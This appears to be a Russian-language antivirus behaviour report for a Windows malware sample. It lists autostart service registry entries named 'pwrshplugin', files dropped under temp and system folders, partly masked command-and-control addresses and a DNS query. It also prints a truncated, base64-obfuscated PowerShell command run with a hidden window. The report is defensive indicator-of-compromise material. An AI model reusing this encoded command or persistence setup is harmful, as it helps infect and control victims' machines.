Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\pwrshplugin] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\pwrshplugin] 'ImagePath' = '"%WINDIR%\SysWOW64\hlink\pwrshplugin.exe"'
- 'pwrshplugin' "%WINDIR%\SysWOW64\hlink\pwrshplugin.exe"
- 'pwrshplugin' %WINDIR%\SysWOW64\hlink\pwrshplugin.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNADcAYwByAGoAMAAxAD0AKAAoACcAWgB0AF8AJwArACcANAAnACkAKwAoACcANABoACcAKwAnAG8AJwApACkAOwAuACgAJwBuAGUAdwAnACsAJwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABFAG4AdgA6AHQAZQBNAFAAXAB3AG8AcgBkAFwAMgAwAD...
- %TEMP%\word\2019\hh6t3if.exe
- %WINDIR%\syswow64\hlink\pwrshplugin.exe
- %TEMP%\word\2019\hh6t3if.exe в %WINDIR%\syswow64\hlink\pwrshplugin.exe
- '45.##.226.117':443
- http://ra###submit.com/search_test/hH5/
- http://45.##.226.117:443/IKVTTKE/pO3nPT9VJ/Eb8lofkOBHaj8z/B6HwB3VWQ5UluFo9o/reon9yunu21hGJt/uKHcFmVM5Ohhfb/ via 45.##.226.117
- DNS ASK ra###submit.com
- '%TEMP%\word\2019\hh6t3if.exe'
- '%WINDIR%\syswow64\hlink\pwrshplugin.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNADcAYwByAGoAMAAxAD0AKAAoACcAWgB0AF8AJwArACcANAAnACkAKwAoACcANABoACcAKwAnAG8AJwApACkAOwAuACgAJwBuAGUAdwAnACsAJwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABFAG4AdgA6AHQAZQBNAFAAXAB3AG8AcgBkAFwAMgAwAD...' (со скрытым окном)